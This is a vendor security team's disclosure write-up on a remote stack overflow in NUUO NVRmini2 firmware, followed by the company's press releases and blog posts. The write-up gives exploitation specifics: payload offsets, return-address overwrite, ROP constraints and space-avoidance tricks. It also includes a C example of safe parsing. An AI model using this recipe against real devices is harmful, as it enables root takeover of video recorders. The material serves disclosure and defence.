Analysis of NUUO NVRmini2 Stack Overflow Vulnerability


Exploiting CVE-2018-19864

– Samuel S., Senior Vulnerability Researcher

During an audit of NUUO’s NVRmini2, a stack overflow vulnerability was discovered in a request handling function in the ‘lite_mv’ custom SIP service binary. The NUUO NVRmini2 runs a custom SIP service on TCP ports 5160 and 5150 via a binary at /NUUO/bin/lite_mv. In order to examine this bug more closely, we analyze the function which handles SIP “NUSP” client requests.

When a client sends a request to the service on TCP port 5150, the ‘lite_mv’ binary calls, from a thread, a function reached through a read-only relocation at 0x0008fed8.

The function reserves 404 bytes of stack for local variables on top of the 28 bytes of registers pushed in the prologue, which include the return address from lr.

A call is made to sub_36d40 with arguments “argument_to_function + 188”, “sscanf_source_buffer”, “\r\n”, “2048”. It is assumed that these arguments are, respectively, an offset pointer passed to the calling function, a pointer to the buffer which will be later passed to sscanf, a string representing the bytes to receive up to, and a maximum number of bytes to receive.

This appears to be intended to receive the first line of a SIP request, up to \x0d\x0a, or 2048 bytes.

During dynamic analysis, sending a request totaling more than 2048 bytes did not proceed beyond this execution path. It was also noted that any METHOD field in the request would reach this execution path regardless of its value, as the value is checked later on in the function.

Next, another call is made to sub_36d40, this time replacing the pointer to the buffer that would be passed to sscanf with another offset of the pointer passed to the caller, and a different terminating string.

This appears to be intended to receive the next and final line of a SIP request, consisting of a CSeq header.

It was noted during dynamic analysis that this value could be arbitrary and still reach this execution path, as the value is not checked until later in the function, like the METHOD value above.

Next, the preparation of the arguments to sscanf is particularly interesting. The third argument to sscanf, r2, is a pointer to an offset inside var_1B0_sscanf_3rd_dest_pointer. The fourth argument to sscanf, r3, is set to stack_pointer+8.

This is interesting for two reasons. First, this location appears to be 8 bytes into the buffer used as the source buffer for the call to sscanf. Second, recalling that the function has only allocated 404 bytes on the stack for local variables, we can conclude that a URI value of 351 bytes will overflow the destination buffer, overwriting other local variables.

In pseudo code, this portion of the function might look like the following:

At this point, we can reasonably assume that we can overflow “var_1B0_sscanf_3rd_dest_pointer + 8” with 420 bytes of padding, overwrite the function's return address with the 421st through 424th bytes, and so control execution flow. However, since this overflow occurs at the beginning of a function with 115 basic blocks, there are some caveats to achieving code execution.

Aside from the ‘lite_mv’ target binary having NX enabled, we recall that the overflow also overwrites the local variables prepared at the beginning of the function.

If we follow the execution flow after the overflow occurs, we can see that, because we deliberately use a value other than “NUSP/1.0” or “NUSP/2.0” for the PROTOCOL value of the request, we follow a branch intended to handle a 500 internal server error response to the client.

Along this branch, we encounter the following instructions, which operate on one of the local variables that were overwritten by sscanf.

Here, the 337th through 340th bytes of our payload have overwritten the value of var_58_sscanf_source_buffer_pointer. This value is decreased by 12 and stored in r4, and compared to 0xffffffff. Since these values are not equal, the branch is taken.

This branch is not taken, and the following instructions are executed.

At this point, a function is called, sub_3366e4, which loads the value at the address stored in “var_58_sscanf_source_buffer_pointer – 4”, wherein a kernel cmpxchg is performed on it, and if the address provided does not point to a string in a writeable memory region, the binary will SEGFAULT before execution flow reaches the terminating block of the function.

In order to bypass this caveat, bytes 337 through 340 must be a little endian, 32-bit integer representing the address of the original value of the local stack variable prior to the offending call to sscanf.

By crafting the payload to include this value, the following execution path is taken, resulting in our controlled return address being popped off the stack back into lr, and branched to.

From here, we can craft a GET request with a PROTOCOL value of anything but “NUSP”, a URI value which includes a leading “/”, 335 bytes of padding, a little endian, 32-bit integer represented as bytes which allows the program to continue execution, 80 bytes of padding, and a ROP chain prepared without 0xff, 0x00, or 0x20.

Each portion of the request, as delimited by newline carriage returns, must be fewer than 2048 bytes in length. The second line of the request can consist of any non-bad characters, but must at least end with two sets of newline carriage returns.

Taking the path of least resistance, preparing a ROP chain to directly achieve arbitrary command execution rather than one to bypass NX and execute code from the stack, we encounter a caveat in well-charted waters: the executed command must not contain any spaces, or the space will be interpreted as the delimiter between the URI and PROTOCOL values. Though there are several ways around this caveat, such as IFS characters or alternate delimiters like tabs, the most flexible solution which the target supported was encoding commands using bracket-expansion.

Note that exploiting this bug, successfully or not, will result in the service crashing and restarting. Continued execution was not explored while analyzing this bug.

Leveraging ROP gadgets from shared libraries loaded by ‘lite_mv’, a proof-of-concept which executes arbitrary system commands was prepared and delivered to the vendor during the disclosure process.

Root cause

The root cause of this stack overflow is an unsafe use of sscanf, using local stack variables as destination buffers. Because the lengths of strings are not checked against destination buffer sizes prior to the call to sscanf, it is possible to overflow local stack variables and gain control of the return address saved on the stack, and therefore, control of execution flow.
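The sscanf pattern described in the analysis above (fixed-size destination buffers on the stack, no length check before the call) as an added C example; this is not the lite_mv binary's code or the vendor's fix. The unsafe parse is shown beside a hardened form that checks each field's length against its destination buffer before calling sscanf and uses width-limited conversions. The function and buffer names, the buffer sizes, and the request-line layout “METHOD URI PROTOCOL” are assumptions for the illustration, sized so that, as in the advisory, a URI of 351 bytes or more is rejected.

```c
#include <stdio.h>
#include <string.h>

/* Sizes are assumptions chosen to match the numbers in the write-up: a line is
 * received up to CRLF or 2048 bytes, and a URI of 351 bytes or more no longer
 * fits its destination buffer (350 bytes plus the terminating NUL). */
#define LINE_MAX_BYTES 2048
#define METHOD_BUF 16
#define URI_BUF 351
#define PROTO_BUF 16

enum nusp_parse_result { NUSP_OK = 0, NUSP_ERR_LINE_TOO_LONG, NUSP_ERR_FIELD_TOO_LONG, NUSP_ERR_MALFORMED };

struct nusp_request_line { char method[METHOD_BUF]; char uri[URI_BUF]; char proto[PROTO_BUF]; };

/* The vulnerable pattern, kept for contrast and never called below: unbounded
 * "%s" conversions copy every non-whitespace byte the client sent, so a URI of
 * URI_BUF bytes or more runs past 'uri' into the neighbouring locals and the
 * saved return address. */
int parse_request_line_unsafe(const char *line)
{
    char method[METHOD_BUF], uri[URI_BUF], proto[PROTO_BUF];
    return sscanf(line, "%s %s %s", method, uri, proto) == 3 ? 0 : -1;
}

/* Before anything is copied, require exactly nfields single-space-separated
 * fields, each at most max_len[i] bytes, followed only by an optional CRLF.
 * Any other whitespace inside a field is rejected because sscanf would split
 * the field there. */
static int check_fields(const char *line, size_t line_len, const size_t *max_len, size_t nfields)
{
    const char *p = line, *end = line + line_len;
    size_t i;
    for (i = 0; i < nfields; i++) {
        size_t n = strcspn(p, " \t\r\n\f\v");
        if (n == 0) return NUSP_ERR_MALFORMED;
        if (n > max_len[i]) return NUSP_ERR_FIELD_TOO_LONG;
        p += n;
        if (i + 1 < nfields) {
            if (p >= end || *p != ' ') return NUSP_ERR_MALFORMED;
            p++;
        }
    }
    if (p < end && strcmp(p, "\r\n") != 0) return NUSP_ERR_MALFORMED;
    return NUSP_OK;
}

/* Hardened form: length checks first, then width-limited conversions so that
 * sscanf cannot write past a buffer even if a check were ever bypassed. */
int parse_request_line_safe(const char *line, struct nusp_request_line *out)
{
    const size_t max_len[3] = { METHOD_BUF - 1, URI_BUF - 1, PROTO_BUF - 1 };
    size_t line_len = strlen(line);
    int rc;
    memset(out, 0, sizeof *out);
    if (line_len > LINE_MAX_BYTES) return NUSP_ERR_LINE_TOO_LONG;
    rc = check_fields(line, line_len, max_len, 3);
    if (rc != NUSP_OK) return rc;
    /* The widths must stay one less than the buffer sizes above. */
    if (sscanf(line, "%15s %350s %15s", out->method, out->uri, out->proto) != 3)
        return NUSP_ERR_MALFORMED;
    return NUSP_OK;
}

/* Parse a line into a static record and return its URI, or NULL on rejection. */
const char *parsed_uri_of(const char *line)
{
    static struct nusp_request_line req;
    return parse_request_line_safe(line, &req) == NUSP_OK ? req.uri : NULL;
}

/* Constructed input: build "GET /AAA... NUSP/1.0\r\n" with a URI of exactly
 * uri_len bytes and run it through the hardened parser. */
int parse_constructed(size_t uri_len)
{
    static char line[LINE_MAX_BYTES + 128];
    struct nusp_request_line req;
    size_t pos = 0;
    if (uri_len == 0 || uri_len + 16 > sizeof line) return NUSP_ERR_LINE_TOO_LONG;
    memcpy(line + pos, "GET ", 4);           pos += 4;
    line[pos++] = '/';
    memset(line + pos, 'A', uri_len - 1);    pos += uri_len - 1;
    memcpy(line + pos, " NUSP/1.0\r\n", 11); pos += 11;
    line[pos] = '\0';
    return parse_request_line_safe(line, &req);
}

int main(void)
{
    size_t lens[] = { 10, 350, 351, 2100 }, i;
    for (i = 0; i < sizeof lens / sizeof lens[0]; i++)
        printf("URI of %4zu bytes -> result %d\n", lens[i], parse_constructed(lens[i]));
    return 0;
}
```

The length check is the fix named in the root cause; the conversion widths are defence in depth, since a width alone would silently truncate an over-long field rather than reject the request.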


San Antonio, TX – November 29, 2018 – Digital Defense, Inc., a leading security technology and services provider, today announced that its Vulnerability Research Team (VRT) discovered a previously undisclosed vulnerability in NUUO NVRmini2 Network Video Recorder firmware. NVRmini2 firmware version 3.9.1 and prior is vulnerable to an unauthenticated remote buffer overflow that could potentially be leveraged by an attacker to execute arbitrary code on the system with root privileges. This could allow the attacker to access and/or modify the camera feeds to the NVR and change the configuration or recordings on the NVR.

What You Can Do

Information regarding the security fixes can be obtained through NUUO.

Details of the individual vulnerabilities can be found on the Digital Defense blog.

Tom DeSot, EVP/Chief Information Officer at Digital Defense, said, “NUUO has worked closely with our VRT to ensure a fix is available to organizations utilizing the affected firmware. NUUO’s rapid response to the identification of the issue and collaboration has resulted in a quick resolution.”

Digital Defense Research Methodology and Practices

The Digital Defense VRT regularly works with organizations in the responsible disclosure of zero-day vulnerabilities. The expertise of the VRT when coupled with the company’s next generation hybrid cloud platform, Frontline Vulnerability Manager, enables early detection capabilities. When zero-days are discovered and internally validated, the VRT immediately contacts the affected vendor to notify the organization of the new finding(s) and then assists, wherever possible, with the vendor’s remediation actions.

NUUO Firmware Disclosure


NUUO Zero-Day Blog

Digital Defense, Inc. is disclosing a vulnerability identified in NUUO NVRmini2 Network Video Recorder devices discovered by our Vulnerability Research Team (VRT). We commend NUUO for their prompt response to the identified flaws and their engineering team’s work with VRT to provide fixes for these cyber security issues.

Clients who currently use Digital Defense’s Frontline.Cloud platform can sweep for the presence of these issues in Frontline VM by performing a full vulnerability assessment scan or selecting CVC NUUO NVRmini2 ‘lite_mv’ Stack Overflow (126553).

Summary

Remote, unauthenticated users can execute arbitrary code on the affected system with root privileges.

Application/Version Affected

NUUO NVRmini2 firmware versions 3.9.1 and prior

Details

Sending a crafted GET request to the affected service with a URI length of 351 or greater will trigger the stack overflow. Overflowing of the stack variable, which is intended to hold the request data, results in the overwriting of stored return addresses, and with a properly crafted payload, can be leveraged to achieve arbitrary code execution.

Root Cause

Improper sanitization of user-supplied inputs and lack of length checks on data used in unsafe string operations on local stack variables.

Thanksgiving is almost here, so the guys give thanks to you, their loyal listeners, with some more great channel content.

First up, Mike Kerr of SUSE strolls into the coffeehouse for some chatter about open source and the growing importance it plays in the channel.

Then, Rosanna Pellegrino takes some time away from her day job at Digital Defense to share the latest about her company and offer tips to both partners and customers about preparing for today’s cybersecurity challenges.

Finally, Channel Partners/Channel Futures news editor James Anderson shares his story about the latest technology he’s encountered — a transcription app to help him process his interviews more quickly. Let’s just say it rapidly devolved into what we’re calling “transcription mad libs.”

Click below at the 35 minute marker to hear Rosanna’s portion of the podcast and enjoy!

Digital Defense Announces Frontline Active Threat Sweep™


San Antonio, TX – November 15, 2018 – Digital Defense, Inc., a leading security technology and services provider, today announced the availability of their next generation Threat Detection technology, Frontline Active Threat Sweep™ (Frontline ATS™), an optional addition to Frontline.Cloud.

Frontline ATS – underpinned by Digital Defense’s patented security assessment technology – operationalizes threat intelligence. The solution fills a unique need in the threat arena by offering an agentless malware detection solution that quickly and reliably analyzes assets across the enterprise for threat activity and indicators of compromise that may have bypassed traditional security defenses.

Time is of the essence when protecting digital assets from cybercriminals. Changing out existing endpoint protection programs in favor of Next Generation Anti-Virus (NGAV) or Endpoint Detection and Response (EDR) offerings requires significant time and investment. Frontline ATS immediately shores up existing defenses and provides visibility as to where organizations need to selectively deploy tools on endpoints when greater levels of forensic analysis are needed. With Frontline ATS, organizations:

“Whether you need to sweep millions of nodes or just a few, Frontline ATS quickly determines if malware has evaded cybersecurity defenses deployed to protect your information assets,” said Mike Cotton, SVP of Engineering at Digital Defense, Inc. “And as with all Digital Defense solutions, Frontline ATS is a cloud-based offering hosted in Amazon Web Services (AWS). Frontline ATS provides clients with the most powerful and configurable threat sweeping solution in the marketplace.”

So, You Cast Your Vote…Or Did You?


Of late, much has been written regarding the dangers of electronic voting machines and how their security controls are either lacking or non-existent, leading to potential voter fraud or changes in how ballots are cast.

Let’s face it, there’s almost nothing more American than going down to a polling station to cast your ballot for your favorite candidate(s). For those that can still remember, this all used to be done via paper (remember the hanging chad?) but those days are, for the most part, long gone. Paper has since been replaced by electronic machines that allow you to cast your ballot in a quick and efficient pattern. But at what cost?

Many of these machines have been found to be susceptible to tampering either electronically or physically. These vulnerabilities place into question whether votes are being placed or if extra votes are being entered into the system. As a result, there are questions about the accuracy of the vote, and whether or not the person who wins at the polls did so in a legal fashion.

On the surface, some tampering here and there may not seem all that important, but when looked at on a state or national scale, the issue becomes quite troubling. Imagine if a candidate was elected and it was later discovered that voting machines had been tampered with on a wide scale, so that the election had to be called into question. Imagine what that type of event would do to our democracy. And it would only snowball from there: more and more elections would be called into question, and there would be turmoil in the entire country. Everyone would be asking what was real and what wasn’t.

Protecting Yourself

So how do you protect yourself and your vote?

Examples of things you can do include, but are not limited to:

If the machine has a visible seal on it, look at the seal and determine if it looks like it has been tampered with. Has it been peeled back, are the corners frayed, does it show “Void” like it has been removed and put back? If so, these are things that you need to immediately point out to the poll workers so that the machine can be taken out of circulation and you can be assigned a new machine to use to cast your vote.

Does the machine have any wires sticking out of it that seem out of place? Remember, this should be a sealed unit with no wires showing. If so, it’s time to point this out to the poll worker.

Lastly, does the machine exhibit any strange behaviors while you’re using it? Does the screen constantly flicker? Do selections seem to switch or not be assigned properly when you select them? If so, step away from the machine and swiftly notify a poll worker of the irregularities that you’re seeing.

Wait…What About the Voting Websites?

While the voting machine scenarios mentioned above may seem farfetched to some, compromising a website is something that happens every day, even to the largest, most sophisticated companies. If states and the federal government don’t begin to take the security of these websites more seriously, there are likely to be real breaches that impact real elections.

As an example of what could happen if things aren’t taken more seriously, children at Rootz during Def Con were able to compromise facsimile voting sites and list people such as Kim Jong-Un as candidates for public office in a state’s elections, sometimes in a matter of minutes. Now, just imagine if the site had been real.

It may not be a lone hacker that takes these sites down or alters them, but nation state actors, with the means, capability and the capacity to do that very thing through coordinated attacks against state or even federal government sites.

Protecting Yourself

You can protect yourself when using an elections website just like you would when you are using your home banking website. Use strong passwords (if they are required), look for anomalous behavior on the part of the website, and make sure that the data that the site is showing seems accurate and legitimate.

If anything seems off, contact your state or federal elections officials and notify them of the issues that you’re seeing. Remember, while it may be a false alarm, it may not be and you may have been the first person to notice the issues on the site.


San Antonio, TX – October 23, 2018 – Digital Defense, Inc., a leading security technology and services provider, today announced that its Vulnerability Research Team (VRT) uncovered four previously undisclosed vulnerabilities within the Arcserve Unified Data Protection platform. The vulnerabilities can open the door for potential compromise of sensitive data through access to credentials, phishing attacks and the ability for a hacker to read files without authentication from the hosting system.

Details of the individual vulnerabilities can be found on the Digital Defense blog.

Mike Cotton, Senior Vice President of Engineering at Digital Defense said, “Arcserve has been extremely responsive and collaborative in working with our VRT to resolve the issues. Our mutual goal is to ensure the security of the organizations utilizing the Arcserve systems.”

Digital Defense Research Methodology and Practices

The Digital Defense VRT regularly works with organizations in the responsible disclosure of zero-day vulnerabilities. The expertise of the VRT when coupled with the company’s next generation hybrid cloud platform, Frontline Vulnerability Manager, enables early detection capabilities. When zero-days are discovered and internally validated, the VRT immediately contacts the affected vendor to notify the organization of the new finding(s) and then assists, wherever possible, with the vendor’s remediation actions.

Arcserve Zero-Day Disclosure


Digital Defense discloses four previously undisclosed vulnerabilities within the Arcserve Unified Data Protection platform. The vulnerabilities can open the door for potential compromise of sensitive data through access to credentials, phishing attacks and the ability for a hacker to read files without authentication from the hosting system.

Vulnerability Description

Unified Data Protection (UDP) is vulnerable to two unauthenticated information disclosures and an external entity attack that could be utilized by an attacker to gain access to database and other credentials and to read files on the system hosting the UDP application without authentication. Additionally, UDP is vulnerable to reflected cross-site scripting (XSS) which could be utilized for phishing purposes.

Digital Defense has once again joined the list of influential cyber security companies that have been chosen by industry veteran, Dr. Edward Amoroso, CEO of TAG Cyber, to assist with this year’s report. The report has been made available today for free download on the Digital Defense website.

“We are excited to work once again with the TAG Cyber team this upcoming year,” said Larry Hurtado President and CEO of Digital Defense. “Through their steady stream of content they continue to showcase our SaaS security solutions and the cloud-based platforms we have developed to deliver these solutions to organizations around the globe. We truly appreciate how they take the time to clearly understand a solution provider’s technical value propositions and then distill the information into mediums easily consumable by cybersecurity professionals.”

The 2019 TAG Cyber Security Annual is designed in this, TAG Cyber’s third year of publication, to provide direct advisory guidance – at no cost – to the enterprise cyber security professional. Their work is created to help cyber defenders more effectively deal with the technical challenges of our industry. These include integrating cyber analytics across the kill chain, introducing automation to streamline security workflow, and adopting cloud infrastructure for enterprise applications and systems.

“The Digital Defense SaaS platform supporting network vulnerability scanning, penetration testing, and web application scanning from a common portal for comprehensive solution management shows how a successful cyber security company is able to help alleviate the burden of information security,” said Amoroso. “Their security risk assessment solutions are proven successes.”

Each year, TAG Cyber publishes its three-volume report to the community for download at no cost. In addition to the Digital Defense website, the report is also available at https://www.tag-cyber.com/. Volume 2 of the report also includes an informative interview with Digital Defense CTO, Gordon MacKay.

How Vulnerable are your Web Applications? Hackers Know.


If your organization is like most, web applications are critical to your business. Whether your web apps serve employees, business partners, customers, or likely a combination of all three, they all share a common ‘openness’ attribute. That openness, while invaluable in reaching intended users, is also a presentation layer that hackers systematically penetrate to compromise your back-end systems, extract valuable data, and score intelligence on your business.

In response to this openness conundrum, you do what you can to thwart hackers’ intrusions. Chances are, your best efforts are reactionary as the web applications are seldom static and are changing faster than you can identify, assess, prioritize, and remediate vulnerabilities. Hackers have noted this dynamic, and apply automated techniques to locate application vulnerabilities and launch a progression of exploratory and exploitation steps. You, unfortunately, are under-equipped to effectively battle well-armed hackers.

You need to arm yourself better. But how? Our recommendation is to merge web application scanning into your organization’s security routines; and that calls for a web application scanning platform. But which platform? Following are the Top 5 platform features we recommend you evaluate:

Ease-of-use – Your need is present, so ease-of-use starts with an intuitive means to commence scanning with a few clicks. Even though your apps have been customized, common functionality is typical for applications of the same type (e.g., eCommerce). Platform-included scanning templates by app type will swiftly identify low-hanging and frequently exploited vulnerabilities. You can tailor scanning to the uniqueness of your apps later. Ultimately, you want scanning to transcend all app stages—development, testing, and production—which means supporting multiple teams of different persuasions. A scanning platform that can ‘speak’ the language of each team assists in the long run.

Relevant and actionable scans – An auto repair shop will inevitably find something to repair; the same with vulnerability scanning. What you want to know is which vulnerabilities are critical from the combined perspective of: severity if exploited, pervasiveness, and likelihood of being exploited. Lacking prioritization from the platform, that task falls on your shoulders. You also want ‘plain English’ vulnerability details: why a priority, where they exist, and remediation options. Drilling down for additional technical details is good, but on an ‘as needed basis’ is fine. False positives also compete for your valuable time. If those false positives are the result of suboptimal triangulation of scanning results and context, consider another platform.

Expert concierge service included – Indisputably, cybersecurity is complex. While an effective scanning platform will reliably complete the heavy lifting, it cannot paper over all complexity. On-call web application vulnerability experts familiar with your environment are an outsourced resource you will need periodically, but without the full-time expense.

Reasonable pricing – Your primary objective is to improve the security of your web applications. Scanning to identify conditions that make web apps less secure is the means. With reasonable pricing, the cost of scanning should not discourage you from pursuing your primary objective. You need flexibility to increase scanning frequency without a cost disincentive.

Ecosystem ready – Good cybersecurity practices require cross-technology collaboration. Your web application scans should be combinable with scans of the server infrastructure to produce a full picture of vulnerability risk (from the application down through the hosting infrastructure). Also, the scanning platform should interoperate with prevention technologies (e.g., web application firewalls) when vulnerability fixes are impractical.

The openness of web applications should not equate to security risk. But it will if you are not proactive in identifying and resolving your application vulnerabilities. Inescapably, a web application scanning platform is essential—but choose wisely as you will depend on this platform extensively.

How Alliances Strengthen Your Cybersecurity Defenses


Reduce Risk by Integrating Vulnerability Management with Network Access Control

What technology allows you to detect when a device such as a laptop, a printer or other, comes on the network, can block that device from accessing the network and may even isolate the device to certain parts of the network? The answer is Network Access Control technology or NAC. More and more organizations are using NAC to manage and monitor network access. But what if I told you, you can super power your NAC and significantly reduce your enterprise security risk by simply adding a touch of “vulnerability intelligence” to the mix? Interested? Read on!

An integration of a vulnerability management system and a NAC allows the NAC to apply security policies to devices wanting access to the network based on the vulnerability information for those devices, such as vulnerability severity, types of vulnerabilities, vulnerability age (how long it has been present and un-remediated), and much more. Take a look at the following figure, which illustrates this integration concept at a high level.

On its own, the NAC may monitor and deny network access to any device based on information it knows about. The Vulnerability Management and scanning solution may periodically assess devices for their weaknesses (vulnerabilities and configuration issues). Together, though, the NAC may use the vulnerability information as part of its access decision policies.

Examples of security policies achieved with such an integration are:

The above are just simple examples of how to power the NAC with a Vulnerability Management solution and its scan intelligence data. Giving the NAC this information allows it to take more granular action and thereby reduce your overall security risk.

“Information Security professionals are increasingly tasked with the installation and management of multiple security technologies to optimally defend against the constant threats that could potentially expose their organization,” said Rosanna Pellegrino, SVP, sales and business development, Digital Defense. “The challenge becomes the resource allocation and expertise required to effectively manage varying systems. Digital Defense and McAfee address a rising industry need to shorten response times from security events and more easily remediate compromised systems.”

The integrated Frontline VM and McAfee ePO solution eases the burdens associated with running multiple systems and simplifies the process of vulnerability and threat management. Common customers benefit from:

Accurate and comprehensive host identification capability

Policy orchestration that automates deployment of agents to unmanaged systems immediately upon detection

As a member of the McAfee Security Innovation Alliance, Digital Defense, Inc. plays a critical role in the program’s mission to accelerate the development of interoperable security products and to simplify the integration of these products within complex customer environments, bringing better value and more protection against the growing threat landscape to joint customers.

“By implementing products that are compatible with McAfee security solutions, our common customers experience faster deployment times and reduced costs,” said D.J. Long, vice president, strategic business development at McAfee. “Security should be easy to manage, so McAfee has taken the steps needed to open up its security risk management architecture and provide customers with the tools to easily manage their multi-vendor security environments. The result is greater protection, reduced risk and increased compliance.”

2018 PCI Community Meeting | Booth#21


When: August 25-27, 2018

Where: The Mirage, Las Vegas, NV

Visit Digital Defense at booth #21 to learn more about our unique approach to PCI Scanning.

Digital Defense was the first vendor to provide a PCI compliance manager service, and remains one of the world’s longest tenured PCI Approved Scanning Vendors (PCI ASV). As an ASV for 13 years running, we have more PCI compliance guidance experience than 90% of the industry’s ASVs.


Provides Organizations with Accurate and Complete Visualization of Network Risks

SAN ANTONIO, TX – July 17, 2018 – Digital Defense, Inc., an industry recognized provider of security assessment solutions, today announced the integration of their proprietary platform, Frontline Vulnerability Manager (Frontline VM™), with ForeScout Technologies, Inc. CounterACT®. As a member of the ForeScout Technology Partner Program, Digital Defense will work with ForeScout to enable real-time assessment, host analysis and policy-based mitigation of endpoint security risks.

“We are pleased to partner with Digital Defense and offer our joint customers a leading integrated security solution that reduces risk and helps to keep threats out,” said Amy De Salvatore, VP, global strategic alliances, ForeScout Technologies. “Together, we are delivering highly accurate network assessments and intelligent automation of workflow processes and policies.”

The integration will provide joint customers with:

Continuous visibility of connected devices

Prompt response to block or quarantine endpoints with critical vulnerabilities

Automated remediation actions

Ability to provide on-demand scans based on ForeScout CounterACT policies

“The Frontline VM integration with ForeScout CounterACT streamlines remediation efforts and improves organizational processes and efficiencies by automating the workflow process of identifying hosts, scanning for known vulnerabilities and risk of hosts,” said Rosanna Pellegrino, SVP, sales and business development, Digital Defense. “The assimilation of data through the two platforms bolsters security with real-time visibility of managed and unmanaged devices.”

2018 Black Hat USA | Booth #L29


When: August 7-10, 2018

Where: Mandalay Bay Convention Center, Las Vegas, NV

Digital Defense, Inc. is excited to announce that we are a Silver Sponsor at Black Hat USA 2018. We invite you to visit us August 8th & 9th in the Business Hall, booth #L29 to learn more about our exciting technology integrations with Frontline VM™, our industry recognized Security assessment platform now residing in the Amazon Web Services (AWS) cloud.

Security Within The Cloud | Digital Defense, Inc.


Adoption of Infrastructure as a Service (IaaS) continues at a rapid pace. According to Frost & Sullivan’s 2018 cloud user survey, over 55% of the survey respondents state they currently use IaaS and another 22% will within two years. Yet, security within the cloud remains a top-of-mind concern and is a principal reason why cloud-deployed workloads are repatriated to enterprise-managed environments.

How then should organizations gain the advantages of IaaS without increasing their security risk? Although it is simple to say “take your current security technologies with you,” the reality is that a “lift and shift” approach may miss the mark, as your current security technologies may not be “cloud friendly.” Rather, we believe a stronger approach is to choose familiar security technologies that are designed to be cloud-friendly and hosted in the same cloud as your workloads.

Let’s take vulnerability scanning as an example. With speed and scalability being driving factors in IaaS adoption, injecting vulnerability scanning into existing and future workloads must have a snap-on, frictionless attribute. Just a few intuitive clicks within build and deploy can make the difference between workloads verified free of known vulnerabilities versus those that are exposed. Explaining why a compromise occurred because of a known vulnerability is never a pleasant conversation.

Workload visibility is also essential. Workloads cannot be protected if their existence is unknown. For this reason, vulnerability scanning must have direct visibility into the account structure that the cloud provider has for its IaaS customers. Again, a “didn’t know that was our workload” is not a pleasant conversation.

Back to speed, vulnerability scanning should operate on cloud time. Reaching into cloud workloads from the outside not only adds latency, it incrementally adds bandwidth cost. Follow the good neighbor policy and eliminate that friction by choosing vulnerability scanning that happens within the same cloud platform as your workloads.

Finally, it’s a global economy. Whether now or later, your reach will cross geographic borders. All major cloud providers have global reach with regional and local segmentation. Vulnerability scanning integrated with the cloud provider inherits global reach with the segmentation needed to comply with data sovereignty and locality regulations.

Whether your organization is already using IaaS or making the move, security should not be an afterthought. Built-in rather than bolt-on has proven to be the better approach. But building in does not mean compromising on how you want the cloud to work for you and protect your valuable assets. Our advice: choose cloud security services that have cloud-friendly attributes built in.

GDPR Playbook

Blog

It’s time to play hardball – Fight and win the GDPR battle with a leader, plan and rock star team.

Yes. We know GDPR is here. Can we talk about something else now?

Nope, not if you haven’t done all your due diligence to implement best practices and comply. Ignorance has been bliss but it’s not an excuse post May 25, 2018.

We’ve already seen GDPR come down hard on day 1 of its enforcement, with complaints against Google, Facebook, Instagram and WhatsApp carrying fines that could total $9.3 billion. It’s easy to think that if you’re a “mostly” U.S.-focused company, or if you’re small or medium in size, GDPR isn’t something you need to concern yourself with. The ugly truth is that is far from the case.

If you’re like the majority of companies, GDPR compliance is definitely still a dilemma even though the deadline has come and gone.

Why?

It’s a regulation and not a straightforward security framework to follow, so there’s a lot of guesswork;

There are significant hurdles in pivoting operations towards new business practices to comply;

Data discovery to find PII, where it is and where it isn’t, is challenging within all systems but especially legacy systems; and

You only have 72 hours to report a breach, which means there isn’t much time for investigation or validation, just to name a few.

Don’t assume or it makes an…

The deadline might have passed but the majority of companies aren’t fully ready. Don’t fool yourself into thinking that because you are compliant with other regulations like PCI DSS or HIPAA you will fall into GDPR compliance fully or easily.

You need to do an internal audit to determine your readiness to comply and build a team of winners to help you conquer. Ask yourself:

What data security safeguards do you have in place currently and how do they align with GDPR requirements?

What standards or regulations are you already compliant with, and where are the gaps between those and the GDPR?

What GDPR supervising authorities should be on your radar based on your business or industry?

Who are your key internal rock stars to help you on your way to GDPR compliance?

How should you organize internally to audit your security practices and controls, and then decide whether they will be sufficient to comply?

Starting there will put you ahead of most at this stage, and having a plan in place can help reduce the chaos that can ensue from ignorance around this complex subject.

Every winning team needs the best players

You need a playbook. Top college football teams didn’t become national champions by shooting from the hip. At the core, they started with a leader who built a team to win. Finding the right skillset for your team is what’s key.

Creating a strong underpinning of security and compliance involves surrounding your organization with a veracious team of people:

An executive, powerhouse player – The tone from the top is key for GDPR compliance and security operations of any kind. An engaged and involved executive doesn’t have to be an expert in security or even IT, but they should comprehend the goals and initiatives and have visibility into all security-related technologies, policies and processes. A good place to start would be your Chief Legal Officer, as they have a big stake in ensuring organizational adherence to GDPR.

This player can be your advocate and watch your back as the rest of your team focuses on executing and getting the job done.

A cybersecurity quarterback – Someone who is willing to lead the team during both the research and implementation process. It’s important that this person is included from the beginning. This person might hold the job title of CISO or ISO and is very focused on bringing departments together to avoid gaps in security and compliance due to silos within the organization.

A compliance or data privacy guru – Someone within your organization that understands GDPR and all other regulations that need to be met with any technology platform you put in place. This is actually a required position in GDPR known as the Data Privacy Officer (DPO) but they might currently hold the title of Compliance Officer or the like. This person has vast knowledge to bring to the table so be sure to stay unbiased and truly take their input under serious advisement.

A security operations watchdog – This is the person that works in-depth within your IT infrastructure to ensure no one is sneaking in through your backdoors. This is the person that is often missing internally from the small to mid-sized business due to lack of budget or scarcity of market supply.

The referee – This member is the one who loves putting processes into place. They are your stream-liners! It’s often someone with administrative duties who knows the ins and outs of your business. This person’s perspective will help you identify gaps that you might not otherwise be aware of if this skill just isn’t in your remit.

The all-star – It’s ok to ask for directions. With your 5 internal team players in place, it’s time to consider outside help. With GDPR being complex, bringing in an expert can really help you win the game faster. Because GDPR is so new, this person might not have many GDPR “wins” under their belt just yet, but if they do, snatch them up! They likely do have compliance and security accolades and significant experience that can help your organization take its GDPR compliance plan to the next level.

Complying with any regulation is difficult but if you keep your wits about you when others are in a panic, it’s probable you’ll come out smelling like roses. Your team is looking for you to lead so create the plays and go for the win.

The Catch-22 of Web Application Innovation

Blog

History or Mystery?

As we look back at the first half of 2018, many of the cyber threat predictions have already come to pass around lack of GDPR compliance, increasing breaches on IoT devices and web apps, more DDoS attacks, etc. The attacks on the web applications like that of MyFitnessPal, TaskRabbit, and Pizza Hut are just the beginning of what’s to come for web application threats.

With breaches hammering the headlines daily, it’s easy to identify a trend: Hacking is a lucrative business and it’s not going anywhere. Savvy business leaders are struggling to keep up with technology, outsourcing, and moving services to IaaS platforms, with less ‘direct’ contact to their assets. Securing and protecting the sensitive data held on those systems is ever more critical to maintaining a strong security posture.

